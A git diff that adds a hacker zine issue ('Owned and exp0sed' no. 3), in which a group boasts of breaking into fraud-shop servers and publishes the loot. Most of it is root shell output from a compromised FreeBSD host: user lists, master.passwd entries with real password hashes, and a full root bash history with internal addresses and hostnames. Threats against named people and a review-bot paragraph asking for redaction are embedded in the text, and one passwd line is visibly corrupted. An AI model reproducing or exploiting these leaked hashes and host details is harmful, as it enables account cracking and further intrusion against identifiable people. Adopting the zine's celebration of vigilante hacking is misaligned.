the banned users puts it nicely: "being lame is one of +fred777's master skills" Just to inform you: We owned Free-Hack with +this technique of course. 
+ +TIME FOR SOME +______________________________________________________________________ +IlapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapsI +Isl_______l__slapslapslapsla_______a__lap__apslapslapslaps__pslap__apI +Ip| __| |.---.-.-----.| _ | |_| |_.---.-.----.| |--.| |aI +Ia|__ | || _ | _ || | _| _| _ | __|| < |__|lI +Il|_______|__||___._| __||___|___|____|____|___._|____||__|__||__|sI +Islapslapslapslapsla|__|pslapslapslapslapslapslapslapslapslapslapslapI +IpslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslaI + +Right, who deserves it? Correct! Suicide and enco for being badass +super high skilled computer professionals ... NOT + +This is a warning Free-Hack. Continue existing and we will show no +mercy. Especially you, J0hn.X3r. Take your chance, go and grow up. + +,_._._._._._._._|____________________________________________________ +|_|_|_|_|_|_|_|_|___________________________________________________/ + ~ last words ~ ! + +That's all for now. We hope that those we have owned understood the +warning and that those who already enjoyed issue one were satisfied +with this release. We will take a little break for now and go to +Hawaii to get our asses drunk. But do not fear. There will always be +enough time for us to audit more code, write more 0day and own more +idiots. We will always watch the scene and act if we are needed. There +is sill a lot to do and the winter of hax is not over yet. So do +expect us. + + |\ + /()/ + \| - the happy ninjas + ____________________________________________________|_._._._._._._._, + \___________________________________________________|_|_|_|_|_|_|_|_| + ! ~ OUTRO ~ + , + . | + / + \ I + / + \ .g88R_ + d888(` ). _ + - --==, 888( ),=-- .+(` )`. +) Y8P( '`, :( . ) + .+(`( , ) .-- `. ( ) ) + (( (..__,:'-' .=( ) ` _` ) ) +`. `( ) ) ( , ) ( ) ._ + ) ` __.:' ) ( ( )) `-',:ccee88oo, +) ) ( ) --' `- __,' ccC8O8O8Q8PoOb.o8oo +.-' (_,' ,') pqdOB69QOFFE4OpugoO9bD + .(_ ) CgggbbU8OU qOp qOdoUOdcb, + . 
, .3X4X5U2M/p u gcoUodpP + .\\\// /douUP +And shepherds we shall be, for thee my Lord for \\\////. (´`) +thee, power hath descended forth from thy hand, |||||. ,.(´ -.),. +that our feet may swiftly carry out thy command. |||/\, ( , ,) +We shall flow a river forth to thee, and teeming |||\/. `-´`´`´. +with souls shall it ever be. In nomine patris, |||||. +et filii, et spiritus sancti ,..,,.,.,....,,,,//||||\...,,,, +,...,...,..,...,,..,,.,.,..,,.,,,.,,,,,,,..,.,,,,...,.,.,...,,..,. +.,.,,,,..,..,.,..,,,,.,..,.,,.,..,..,,,,.,...,,..,,,..,..,....,..,..,. diff --git a/owned and exposed/3.txt b/owned and exposed/3.txt new file mode 100644 index 0000000..f140061 --- /dev/null +++ b/owned and exposed/3.txt 
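Review bot: secrets and personal data are committed verbatim in the hunk that ends just above the `owned and exposed/3.txt` header. The `download.php` listing carries a hard-coded MySQL password for the `root` account, both `.htpasswd` listings carry password hashes, and the "FREE-HACK LIST OF LAME" block carries a username, hash, salt and e-mail address on every line. Replace those values with an obvious placeholder such as `[REDACTED]` before this lands, and keep only the surrounding narrative and file listings that the archive needs for historical context. If the credential values must stay for provenance, say so in the commit message so that secret scanners flagging this file can be triaged against a documented decision.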
@@ -0,0 +1,13117 @@ + |\___/| + -=[ISSUE - NO 3]=- =) ^Y^ (= + -=[OF]=- \ ^ / + )=*=( + ______________________________ __ ____________ _ / \ +|.-----.--.--.--.-----.-----.--| | ___ ___ _| || | | +|| _ | | | | | -__| _ | | . | | . || /| | | |\ +||_____|________|__|__|_____|_____| |__,|_|_|___|| \| | |_|/\ +| | | ______ |__//_// ___/ __ +| | | .-----.--.--.-----.| |.-----.--\_).--| || +| | | | -__|_ _| _ || || ||__ --| -__| _ || +| | | |_____|__.__| __|| || ||_____|_____|_____|| +|_/ \__________________________|__|___| || |___________________| + |______| + + Featuring... .---. /\ Brought to you by .---. + / . \ / \ your Happy Ninjas / . \ + |\_/| | | | |\_/| | + | | /| | b | | | /| + .-----------------------' | | a | .---------------------------' | + / .-. | | c | / .-. | +| / \ Intro | | k | | / \ The Happy Ninja Faker | +| |\_. | St0re.cc | | | | |\_. | Swissfaking.net | +|\| | /| El-Basar.biz | | | |\| | /| Vpn24.org | +| `---' | | | o | | `---' | | +| |------------------' | n | | |----------------------' +\ | .---. | c | \ | .---. + \ / / . \ | e | \ / / . \ + `---' |\_/| | | | `---' |\_/| | + | | /| | | | | /| + .-----------------------' | | a | .---------------------------' | + / .-. | | g | / .-. | +| / \ Undercover.su | | a | | / \ Secure-Host.in | +| |\_. | k!LLu's Botnet | | i | | |\_. | Unique-Crew.net | +|\| | /| | | n | |\| | /| | +| `---' | | | | | `---' | | +| |------------------' | | | |----------------------' +\ | .---. | h | \ | .---. + \ / / . \ | e | \ / / . \ + `---' |\_/| | | r | `---' |\_/| | + | | /| | e | | | /| + .-----------------------' | | | .---------------------------' | + / .-. | | | / .-. | +| / \ Zion-Network.net | | t | | / \ Some leftovers | +| |\_. | Hackbase.cc | | o | | |\_. 
| Outro | +|\| | /| | | | |\| | /| | +| `---' | | | | | `---' | | +| |------------------' | r | | |----------------------' +\ | | m | \ | + \ / | | \ / + `---' | /\ | `---' + :\______|/ \|______/: + \__0day______0day__/ + | /\ | + || || + || || + || || + || || + | \/ | + \____/ + (____) + +First of all, here is the verification of the sha1 hash we published +when hba-crew got owned: 49bd4433fff1b04530dcaff1f52fa971ff895871 = +sha1(HAPPY_NINJAS_ARE_STAYING_HAPPY_exp03) + + ,;~;, + /\_ + ( / + (() //) + | \\ ,,;;'\ + __ _( )m=((((((((((((((========={ Intro }=========------- + /' ' '()/~' '.(, | + ,;( )|| | ~ Tonight's the night. And it's going to happen, +,;' \ /-(.;, ) again and again. It has to happen. + ) / ) / + // || We all want to welcome you to a brand new issue + )_\ )_\ of Owned and exp0sed! Before we get to the fun +part, we'd just like to clarify some things since there has been a lot +going on on the internet since our last issue. + +Movements, as they put it, like Anonymous or the short-lived +phenomenon of Lulzsec have gotten an increasingly important topic to +media and the public. We want to line out our motivation in contrast +to theirs. Anonymous has tried to gain as much media attention as +possible by inflicting the most damage possible on big companies and +service providers. Similarily, Lulzsec have attacked various websites +and published an enormous amount of information. + +However, while it's their goal to put up pressure on governments and +big organizations, it's ours to protect the public from the abysses of +the internet. Fraud is our main concern and we intent to contain it as +much as possible. While Anon and Lulzsec toss out their stuff within +weeks, we take our time to gain access, collect data and aggregate it +nicely for you, our readers. This is why there is a substantial +time span between our releases. 
+ +We of course also monitor the German and international fraud scene as +it recovers from our attacks; it's hard to stop something that is +driven by selfishness, greed and money. We also find it worrying that +Anonymous and especially Lulzsec act in what they call "Operation +Antisec". The original Antisec Movement was brought to life by actual +hackers and targeted full disclosure and the corporate security +industry. Publishing gigantic amounts of (corporate) data on the +internet does exactly the opposite: It provides the security industry +with the attention they need and hence new customers. + +But let's now look at why we are here today. "Money is the root of all +evil" as the proverb has it; and it's why fraud communities do come +back after we have owned and exposed them; but as long as they carry +on, we do, too. Fraudsters ought to know that they're not safe because +we are going to hunt down every single site that is left. We +experience the fraud scene scattering wider and wider after every +issue we have published; new boards, and with them new admins, emerge +out of nowhere. That just shows well again how stubborn fraudsters are +as most of them still refuse to accept that they lost their right to +exist on the internet. It's particularly frustrating that they don't +seem to draw lessons from getting owned again and again. + +That being said we can just strongly advise you to spend your time on +something worthwhile. It's not too late ... + ,;~;, + _/\ + \ ) + (\\ ()) + /';;,, // | +-------========={ St0re.cc }==========))))))))))))))=m( )_ __ + | ,(.' '~/()' ' '\ +Let's head to our first target. Fraud or scene ~ | ||( );, +shops in general have not been our main concern. ( ,;.)-\ / ';, +During our many break-ins in other fraud \ ( \ ( +communities, we often were dazzled with glaring || \\ +banners of underground markets where you could buy /_( /_( +"fresh" CCs, PayPal accounts or socks5 proxies to stay "secure" while +carding. 
So by now we got the hint that it might be worth finding out +out how often and by whom these shops were really used. It's quite +impressive how much money you can make by simply stealing PayPal +accounts with a RAT and not using it for fraud but for selling it to +scammers instead. That's why we clicked on the first banner we saw and +concluded that it would be a noble action to root. We actually got +pretty lucky since st0re.cc was not the only credit card store on that +server. We spotted some others like the infamous El-Basar.biz (it was +already shown in a German tv show), the rest is not worth to mention. +Anyway this is what you get if you decide to buy credit cards in a +webshop: You will get owned and exposed. Like always. + +# uname -a +FreeBSD 6.4-RELEASE-p11 i386 i386 SMP-GENERIC + +# id +uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) + +# cat /etc/passwd +# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ +# +root:*:0:0:Charlie &:/root:/usr/local/bin/bash +toor:*:0:0:Bourne-again Superuser:/root: +daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5:System &:/:/usr/sbin/nologin +bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8:News Subsystem:/:/usr/sbin/nologin +man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66:UUCP 
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +cyrus:*:60:60:the cyrus mail server:/nonexistent:/usr/sbin/nologin +nukeuploads:*:1001:1001:User &:/home/nukeuploads:/bin/sh +ayoga:*:1002:1002:User &:/home/ayoga:/sbin/nologin +alg:*:1004:1004:User &:/home/alg:/bin/sh +propiska:*:1005:1005:User &:/home/propiska:/sbin/nologin +msk:*:1007:1007:User &:/home/msk:/sbin/nologin +vestacomp:*:1006:1006:User &:/home/vestacomp:/sbin/nologin +crank2010:*:1016:1016:User &:/home/crank2010:/sbin/nologin +lordknight:*:1019:1019:User &:/home/lordknight:/bin/sh +madrage:*:1003:1003:User &:/home/madrage:/bin/sh +scenehack:*:1008:1008:User &:/home/scenehack:/sbin/nologin +thefuelru:*:1009:1009:User &:/home/thefuelru:/sbin/nologin +mr101:*:1021:1021:User &:/home/mr101:/bin/sh +szenevz:*:1011:1011:User &:/home/szenevz:/sbin/nologin +exchanger:*:1012:1012:User &:/home/exchanger:/bin/sh +filip:*:1023:1023:User &:/home/filip:/sbin/nologin +mmgen:*:1018:1018:User &:/home/mmgen:/sbin/nologin +ganymedes:*:1024:1024:User &:/home/ganymedes:/sbin/nologin +garf:*:1031:1031:User &:/home/garf:/sbin/nologin +onlineschauen:*:1013:1013:User &:/home/onlineschauen:/bin/sh +snetwork:*:1022:1022:User &:/home/snetwork:/sbin/nologin +useresu:*:1010:1010:User &:/home/useresu:/sbin/nologin +useresu1:*:1026:1026:User &:/home/useresu1:/sbin/nologin +margosha:*:1020:1020:User &:/home/margosha:/sbin/nologin +pavlrse:*:1027:1027:User &:/home/pavlrse:/sbin/nologin +muraaat:*:1000:1000:User &:/home/muraaat:/sbin/nologin +test4me:*:1014:1014:User &:/home/test4me:/bin/sh + +# cat /etc/master.passwd +# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ +# 
+root:*:0:0::0:0:Charlie &:/root:/usr/local/bin/bash +toor:*:0:0::0:0:Bourne-again Superuser:/root: +daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5::0:0:System &:/:/usr/sbin/nologin +bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin +man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125::0:0:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +cyrus:*:60:60::1172782800:0:the cyrus mail server:/nonexistent:/usr/sbin/nologin +nukeuploads:$1$hO28fqpU$OL/RovJhduUxEqR3kBawe.:1001:1001::0:0:User &:/home/nukeuploads:/bin/sh +ayoga:$1$CNCuqfrs$p7QpuHI6jagkVUyvGO5MI.:1002:1002::0:0:User &:/home/ayoga:/sbin/nologin +alg:$1$A07..akS$.TPW7o0ZCO25bB6AltS/Q.:1004:1004::0:0:User &:/home/alg:/bin/sh +propiska:$1$Hgb0peXw$2wtRLXytI9Mmwbsxi/RAI.:1005:1005::0:0:User &:/home/propiska:/sbin/nologin 
+msk:$1$yqxdalvS$IPYorMt8h.pMqc3V8mdED0:1007:1007::0:0:User &:/home/msk:/sbin/nologin +vestacomp:$1$bL6RZJ2K$f7CTWRj.ps2Q9XuImy4sI1:1006:1006::0:0:User &:/home/vestacomp:/sbin/nologin +crank2010:*:1016:1016::0:0:User &:/home/crank2010:/sbin/nologin +lordknight:*:1019:1019::0:0:User &:/home/lordknight:/binbreak-ins in other fraud/sh +madrage:*:1003:1003::0:0:User &:/home/madrage:/bin/sh +scenehack:*:1008:1008::0:0:User &:/home/scenehack:/sbin/nologin +thefuelru:*:1009:1009::0:0:User &:/home/thefuelru:/sbin/nologin +mr101:*:1021:1021::0:0:User &:/home/mr101:/bin/sh +szenevz:*:1011:1011::0:0:User &:/home/szenevz:/sbin/nologin +exchanger:*:1012:1012::0:0:User &:/home/exchanger:/bin/sh +filip:$1$asb5GyOE$OHPPapNFMf6zKA5FvrIpE/:1023:1023::0:0:User &:/home/filip:/sbin/nologin +mmgen:$1$bnXQT0ng$obWjcBQFTBTKk83ElXfDt0:1018:1018::0:0:User &:/home/mmgen:/sbin/nologin +ganymedes:$1$95EongK1$fFPWI1ePR8VKBIAQ/LwUu0:1024:1024::0:0:User &:/home/ganymedes:/sbin/nologin +garf:$1$xzEPVuNH$26jps1eOPu2hNObvlcgkH0:1031:1031::0:0:User &:/home/garf:/sbin/nologin +onlineschauen:$1$RihNUTco$hzbht5CwvI/h3X0cGe8T91:1013:1013::0:0:User &:/home/onlineschauen:/bin/sh +snetwork:$1$y0T7yJX4$ER.mYpG3P21qlz3qgQWtN.:1022:1022::0:0:User &:/home/snetwork:/sbin/nologin +useresu:$1$6J5xPk5F$sfpn5pAKTlf10hX3kSKkv.:1010:1010::0:0:User &:/home/useresu:/sbin/nologin +useresu1:$1$gPsMDoWO$.Ve9Z8tEQLZrlF7MrP6ZH1:1026:1026::0:0:User &:/home/useresu1:/sbin/nologin +margosha:*:1020:1020::0:0:User &:/home/margosha:/sbin/nologin +pavlrse:$1$AKfcvELm$oImAlQWKKDaEd.dimM6wY/:1027:1027::0:0:User &:/home/pavlrse:/sbin/nologin +muraaat:*:1000:1000::0:0:User &:/home/muraaat:/sbin/nologin +test4me:$1$nNH.D3yA$2KQeYLwqG3TcFHOc9toFL0:1014:1014::0:0:User &:/home/test4me:/bin/sh + +# pwd +/root + +# ls -la +total 715748 +drwxr-xr-x 4 root wheel 512 Sep 9 04:43 . +drwx--x--x 18 root wheel 512 Apr 12 19:59 .. 
+-rw------- 1 root wheel 10017 Sep 26 02:59 .bash_history +-rw------- 1 root wheel 67 Sep 9 17:00 .cvspass +-rw------- 1 root wheel 50 Feb 9 2011 .lesshst +drwxr-xr-x 3 root wheel 512 Sep 26 02:57 .mc +-rw------- 1 root wheel 1344 May 20 03:24 .mysql_history +drwx------ 2 root wheel 512 Aug 14 19:22 .ssh +-rwxr-xr-x 1 root wheel 241 Jul 21 00:11 addban.sh +-rw-r--r-- 1 root wheel 601437 Apr 12 17:56 apache.log +-rwxr-xr-x 1 root wheel 89 Mar 6 2010 apache_watchdog.php +-rwxr-xr-x 1 root wheel 4184 Feb 2 2011 mydumpsplitter.sh +-rwxr-xr-x 1 alg www 365607550 Feb 1 2011 zzz.sql + +# cat .bash_history +apachectl restart +exit +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +/usr/local/etc/rc.d/apache22 restart +top -S +tail -f /var/log/httpd/httpd_access.log +/usr/local/etc/rc.d/apache22 restart +/usr/local/etc/rc.d/apache22 restart +/usr/local/etc/rc.d/apache22 restart +cd /home/alg/ +mc +mysql -u root -p`cat /etc/my.passwd ` +cd db_split/ +mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < postindex.sql +ls -la +mcedit postindex.sql +mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < adminlog.sql +mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < attachment.sql +top +cd .. 
+wget +wget http://platon.sk/cvs/cvs.php/___checkout___/scripts/perl/mysql/mysqldump-convert.pl?rev=1.5&content-type=text/plain mysqldump-convert.pl +mc +ls +mcedit mysqldump-convert.pl\?rev\=1.5 +mc +cat db_split/postindex.sql | ./mysqldump-convert.pl > postindex.sql +mcedti postindex.sql +mcedit postindex.sql +mcedit mysqldump-convert.pl +mysql -u root -p`cat /etc/my.passwd` --default-character-set=utf8 -f alg_forum < postindex.sql +exit +mc +/usr/local/etc/rc.d/apache22 restart +top +mc +date +exit +mc +cd /home/nukeuploads/nukeuploads.com/ +chown nukeuploads:nukeuploads google4973efd9f5db5c16.html +mc +apachectl restart +uptime +top +tail -n 1000 /var/log/httpd/httpd_access.log +ps aux | grep nginx +mc +exit +apachectl stop +uptime +uptime +uptime +uptime +uptime +top +apachectl start +exit +tail -n 1000 /var/log/httpd/httpd_access.log +exit +top +apachectl restart +top +tail -n 1000 /var/log/httpd/httpd_access.log +tail -n 1000 /var/log/httpd/httpd_access.log +exit +apachectl restart +top +exit +tail -f /var/log/httpd/httpd_access.log +apachectl stop +killall -9 httpd +apachectl start +tail -f /var/log/httpd/httpd_access.log +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +mc -d +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +top +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +ps ax|grep -c http +top +top +uptime +uptime +uptime +uptime +uptime +uptime +top +cd /home/kirbysho/ +mc +uptime +uptime +uptime +mcedit /usr/local/etc/apache22/vhosts/kirbysho.conf +apachectl restart +top +mc +mcedit /usr/local/etc/apache22/vhosts/kirbysho.conf +apachectl restart +uptime +uptime +uptime +uptime +uptime +uptime +top +tail -n 100 /var/log/httpd/httpd_access.log +uptime +uptime +uptime +uptime +top +exit +apachectl restart +exit +tail -f /var/log/httpd/httpd_access.log +killall 
-9 httpd +apachectl restart +top +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru +mc -d +date +date +date +date +date +date +date +date +killall -9 httpd +apachectl start +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru +tail -n 10000 /var/log/httpd/httpd_access.log | grep "russian-elite" > /root/apache.log +mc +killall -9 httpd +apachectl start +top +tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru +killall -9 httpd +apachectl start +tail -f /var/log/httpd/httpd_access.log |grep kirby-shop.ru +cat /var/log/httpd/httpd_access.log | grep kirby-shop.ru > /var/log/httpd_kirby.log +cat /var/log/httpd/httpd_access.log +cat/var/log/httpd_kirby.log +cp /var/log/httpd_kirby.log +cp /var/log/httpd_kirby.log /home/kirbysho/ +ls /home/kirbysho/ +exit +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +top +top +ps ax +tail -f /var/log//httpd/httpd_access.log +tail -f /var/log//httpd/httpd_access.log +ps ax +top +ls -l +ping ya.ru +ping google.com +exit +mc +tail -f /var/log/httpd/httpd_access.log +mc +mc +mysql -unukeuploads_gla -p -h db.nukeuploads.com nukeuploads_gla +mysql -unukeuploads_gla -p -h +mysql -unukeuploads_gla -p -h +mysql -unukeuploads_gla -p -h 92.241.164.71 nukeuploads_gla +mc +nslookup +mc +nslookup +tail -n 1000 /var/log/httpd/httpd_access.log +exit +tail -n 1000 /var/log/httpd/httpd_access.log +top +exit +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +tail -n 1000 /var/log/httpd/httpd_access.log +exit +tail -n 100 /var/log/httpd/httpd_access.log +tail -n 100 /var/log/httpd/httpd_access.log | grep russian | wc -l +exit +tail -f /var/log/httpd/httpd_access.log +touch ~/addban.sh +chmod +x ~/addban.sh +mcedit ~/addban.sh +tail -n 100 /world/sec1005/var/log/httpd/httpd_access.log | grep 
'swissfaking.net' | awk '{print }' | sort | uniq -c | sort -n | awk '{if ($1>3) print $2}' +/usr/local/etc/rc.d/apache22 restart +/usr/local/etc/rc.d/apache22 restart +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +/usr/local/etc/rc.d/nginx status +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +tail -f /var/log/httpd/httpd_access.log +tcpdump -nn host 187.160.244.66 +tcpdump -nni bge0 host 187.160.244.66 +tcpdump -nni bge0 host 187.160.244.66 +sort /var/log/httpd/httpd_load.log | awk '{print $1}' | uniq -c +mc +mc -d +php -V +php -v +mysql -v +mysql -V +top +mc +ls -la +cd /home/margosha/ +ls -la +pwd +mc +killall -9 mc +ls -la +cd forum.la2amadis.ru/ +ls -la +cd .. +ls -la +chown -cRv margosha:www ./* +chown -cRv margosha:www ./* +chown -cR margosha:www ./* +chown -R margosha:www ./* +ls -la +cd forum.la2amadis.ru/ +ls -la +cd .. +ls -la +cd la2amadis.ru/ +ls -la +mc +ps ax +w +ps axu +ps axu +tail -f /var/log/httpd/httpd_access.log +exit +ps wauxf +cat /proc/22623/cmdline +kill -9 22623 +ps wauxf +df -h +cd /home/toco123/ +ls -la +cd 00/ +ls -la +mc +killall -9 mc +ps wauxf +df -h +ls /tmp +ls -la +ls -la /tmp/ +ps wauxf +df -h +w +cd / +ls -la +cat /etc/fsta +ps wauxf +kill -9 22623 +cd /tmp/ +ls -la +rm a.* +ls -la +tail -f /var/log/httpd/httpd_access.log +w +ps wauxf +ifconfig +cd /home/ +ls -la +mc +cd /home/margosha/ +tar czfv backup.tgz forum.la2amadis.ru la2amadis.ru +mc +chown margosha:www backup.tgz +mc +php -v +cd /usr/ports/mail/php-imap +cd /usr/ports/ +cd ./mail +ls |grep imap +cd php5-imap +make install clean +cd /usr/local/etc/ +ls +mc +mc +cd /usr/ports/mail/php52-imap +make install clean +cd /usr/ports/mail/php5-imap +make install clean +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +cd /usr/ports/mail/php52-imap +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +cd /usr/ports/ports-mgmt/portdowngrade +make install 
clean +make install clean +cd /usr/ports/mail/php5-imap +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +cd /usr/ports/mail/php5-imap +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +php -m +whereis portdowngrade +cd /usr/ports/ports-mgmt/portdowngrade +make install clean +cd /usr/ports/devel/popt +make install clean +cd /usr/ports/devel/libtool22 +make install clean +cd - +make install clean +uname -a +php -v +cd /usr/ports/lang/php52-extensions/ +make config +make +cd ../php5-extensions/ +make config +make +php -v +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +touch /root/.cvspass +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +php -v +portdowngrade -s :pserver:anoncvs@anoncvs.fi.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.fi.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.tw.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 -o anoncvs +portdowngrade -o anoncvs -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -o=anoncvs -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -o anoncvs -s :pserver:anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.manov.su:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.manov.su:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.manov.su:/home/ncvs lang/php5 +server_args = -f --allow-root=/test pserver +cat /etc/inetd.conf +cat /etc/inetd.conf | grep allow +portdowngrade -s :pserver:anoncvs@cvsup13.tw.freebsd.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:cvsup13.tw.freebsd.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs1.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s 
:pserver:anoncvs@cvsup13.fr.freebsd.org:/home/ncvs lang/php5 +mc +php -v | grep imap +php -m | grep imap +portdowngrade -s :pserver:anoncvs@anoncvs1.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs2.FreeBSD.org:/home/ncvs lang/php5 +php -v +portdowngrade lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs1.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.at.FreeBSD.org:/home/ncv lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.at.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.de.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -r -s :pserver:anoncvs@anoncvs.de.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.de.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :login:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s :pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs lang/php5 +portdowngrade -s ":pserver:anoncvs@anoncvs.jp.FreeBSD.org:/home/ncvs" lang/php5 +portdowngrade -s ":pserver:anoncvs@anoncvs.fr.FreeBSD.org:/home/ncvs" lang/php5 +portdowngrade -o -s ":pserver:anoncvs@anoncvs.fr.FreeBSD.org:/home/ncvs" lang/php5 +portdowngrade -o -s ":pserver:anoncvs@anoncvs.fr.FreeBSD.org:/home/ncvs" lang/php5 +cd /usr/ports/mail/php5-imap/ +make config +make +cd .. +cd .. +mc +cd distfiles/ +fetch http://downloads.php.net/ilia/php-5.2.5.tar.bz2 +cd .. +cd mail/php5-imap/ +make +make install +php -m +php -m | grep imap +ls /var/db/pkg/| grep extre +ls /var/db/pkg/| grep exte +ls +mc + +# cd /home/mmgen + +total 44 +drwxr-x--- 7 mmgen www 512 Jun 11 13:18 . +drwx--x--x 28 root wheel 1024 Sep 14 17:31 .. 
